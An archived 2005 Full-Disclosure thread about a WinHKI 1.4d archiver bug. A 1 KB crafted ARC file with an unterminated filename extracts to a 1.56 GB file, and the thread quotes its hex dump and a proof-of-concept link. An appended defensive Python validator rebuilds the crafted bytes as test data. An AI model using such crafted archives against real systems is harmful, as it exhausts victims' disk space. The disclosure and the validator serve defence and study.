Message-ID: <025c01c4f7f4$769b32e0$de03a8c0@Finjan.co.il>
From: rivgi at finjan.com (Rafel Ivgi)
Subject: WinHKI - ARC File Extraction of 1KB to 1.56GB
The original file wasn't a 1.56 with nulls that were compressed; it was a
small file with 1024 FF's which was extracted to
1.56 of nulls... that is not obvious, that is a bug.
Rafel Ivgi
Security Consultant
----- Original Message -----
From: "bipin gautam" <visitbipin@...oo.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Saturday, January 08, 2005 11:29 AM
Subject: Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB
> that's obvious, isn't it... say... if you create a few
> GB file with null characters, 0X00, and compress
> it...... that will produce a similar result. such an
> issue has been known for any file compression utility for ages.
>
>
> any... software will do the same! try it. and THAT'S
> OBVIOUS!
> --- "Rafel Ivgi, The-Insider" <theinsider@....net.il>
> wrote:
>
>>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> Application: WinHKI
>> Vendors: http://www.webtoolmaster.com
>> Versions: 1.4d
>> Platforms: Windows
>> Bug: ARC File Extraction of 1KB to 1.56GB
>> Exploitation: Local (extract file)
>> Date: 24 Dec 2004
>> Author: Rafel Ivgi, The-Insider
>> E-Mail: the_insider@...l.com
>> Website: http://theinsider.deep-ice.com
>>
>>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> 1) Introduction
>> 2) Bugs
>> 3) The Code
>>
>>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ===============
>> 1) Introduction
>> ===============
>>
>> WinHKI is a file archiver which supports the ARC, BH,
>> CAB, HKI, JAR, LHA, TAR and GZ compression formats.
>>
>>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ======
>> 2) Bug
>> ======
>>
>> This is a normal CAB compressed file header
>>
>> 00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B  ..251.HTM.^^^^^.
>> 00000010 0000 0078 3139 73B5 121B 0000 003C 7363  ...x19s......<sc
>> 00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73  ript.>alert()</s
>> 00000030 6372 6970 743E 0D0A 1A00                 cript>....
>>
>> By adding a certain amount of chars after the filename header
>> and replacing all nulls (00) with FF (in order to
>> prevent our long string from being terminated)
>>
>> 00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF  ..251.HTM.^^^^^.
>> 00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
>> 00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B  ................
>> 00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363  ...x19s......<sc
>> 00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73  ript.>alert()</s
>> 00000430 6372 6970 743E 0D0A 1A00                 cript>....
>>
>>
>> HKI will create a 1.56 GIGA BYTE file at the
>> selected extraction location.
>>
>>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ===========
>> 3) The Code
>> ===========
>>
>> An online proof of concept can be found at:
>> http://theinsider.deep-ice.com/hki156gb.ARC
>>
>>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ---
>> Rafel Ivgi, The-Insider
>> http://theinsider.deep-ice.com
>>
>> "Scripts and Codes will make me D.O.S , but they
>> will never HACK me."
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter:
>> http://lists.netsys.com/full-disclosure-charter.html
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
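The disagreement in this thread is about where the blame lies: the crafted archive is about 1 KB, so the large output is not a compression ratio but the extractor trusting fields in a header whose filename was never terminated. Below is an added defender-side example, written for this page and not taken from the thread or from WinHKI, that validates SEA ARC entry headers before any output is written. The header layout it assumes (0x1A marker, method byte, 13-byte NUL-terminated name, little-endian compressed size, date, time, CRC-16, original size; method 1 headers omit the original size) is the classic ARC format and lines up with the bytes in both quoted dumps. The two archives are reconstructed from those dumps as constructed byte strings; a third variant with an inflated original-size field is constructed here to show the size cap on its own. MAX_OUTPUT_BYTES and MAX_RATIO are policy values chosen for the example, not values from the advisory.

```python
import struct

ARC_MARK = 0x1A
MAX_OUTPUT_BYTES = 64 * 1024 * 1024  # per-entry output cap; policy value chosen for this example
MAX_RATIO = 100                      # declared/compressed ratio cap; also an example policy value

# Constructed from the benign dump in the advisory: 58 bytes, one stored entry.
BENIGN = bytes.fromhex(
    "1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B"
    "0000 0078 3139 73B5 121B 0000 003C 7363"
    "7269 7074 FB3E 616C 6572 7428 293C 2F73"
    "6372 6970 743E 0D0A 1A00"
)

# Constructed from the crafted dump: the NUL after the name becomes FF, 1024 FF
# bytes are inserted, and the remaining NULs become FF (1082 bytes in total).
CRAFTED = (
    bytes.fromhex("1A02 3235 312E 4854 4DFF 5E5E 5E5E 5E")
    + b"\xFF" * 1024
    + bytes.fromhex(
        "1B FF FF FF 78 31 39 73 B5 12 1B FF FF FF 3C 73 63 72 69 70 74 FB 3E"
        "61 6C 65 72 74 28 29 3C 2F 73 63 72 69 70 74 3E 0D 0A 1A 00"
    )
)

# Constructed variant: a well-formed name, but the original-size field claims
# 1.6 GB for a 27-byte entry. Method 3 (packed) so the sizes may differ.
_inflated = bytearray(BENIGN)
_inflated[1] = 3
struct.pack_into("<I", _inflated, 25, 1_600_000_000)
INFLATED = bytes(_inflated)


def parse_entry(blob: bytes, offset: int):
    """Validate and decode one entry header at `offset`.

    Returns (name, method, csize, osize, data_offset) for a data entry, or
    None at the 0x1A 0x00 end-of-archive marker. Raises ValueError on the
    first field that fails validation, before any output would be written.
    """
    remaining = len(blob) - offset
    if remaining < 2 or blob[offset] != ARC_MARK:
        raise ValueError("missing 0x1A entry marker")
    method = blob[offset + 1]
    if method == 0:
        return None
    header_len = 25 if method == 1 else 29  # method 1 carries no original-size field
    if remaining < header_len:
        raise ValueError("truncated entry header")
    name_field = blob[offset + 2:offset + 15]
    if b"\x00" not in name_field:
        # The crafted archive fails here: a name that never terminates is
        # exactly what lets a naive extractor read far past the 13-byte field.
        raise ValueError("filename not NUL-terminated within its 13-byte field")
    name = name_field.split(b"\x00", 1)[0].decode("ascii", errors="replace")
    csize, _date, _time, _crc = struct.unpack_from("<IHHH", blob, offset + 15)
    osize = csize if method == 1 else struct.unpack_from("<I", blob, offset + 25)[0]
    data_offset = offset + header_len
    body = len(blob) - data_offset
    if csize > body:
        raise ValueError(f"compressed size {csize} exceeds the {body} bytes left in the archive")
    if method in (1, 2) and osize != csize:
        raise ValueError("stored entry declares an original size different from its compressed size")
    if osize > MAX_OUTPUT_BYTES:
        raise ValueError(f"declared output size {osize} exceeds the {MAX_OUTPUT_BYTES}-byte cap")
    if osize > max(csize, 1) * MAX_RATIO:
        raise ValueError("declared expansion ratio exceeds the cap")
    return name, method, csize, osize, data_offset


def list_entries(blob: bytes):
    """Walk every header, returning [(name, method, csize, osize), ...]."""
    entries, offset = [], 0
    while True:
        entry = parse_entry(blob, offset)
        if entry is None:
            return entries
        name, method, csize, osize, data_offset = entry
        entries.append((name, method, csize, osize))
        offset = data_offset + csize


def check(blob: bytes):
    """Return (True, entries) if every header validates, else (False, reason)."""
    try:
        return True, list_entries(blob)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("crafted", CRAFTED), ("inflated", INFLATED)):
        print(f"{label}: {len(blob)} bytes -> {check(blob)}")
```

Header validation is only the first gate: because a compressed stream can still expand past what its header declares, a real extractor should also count bytes as it writes and stop at the same cap, so that the limit holds even when the header lies in the other direction.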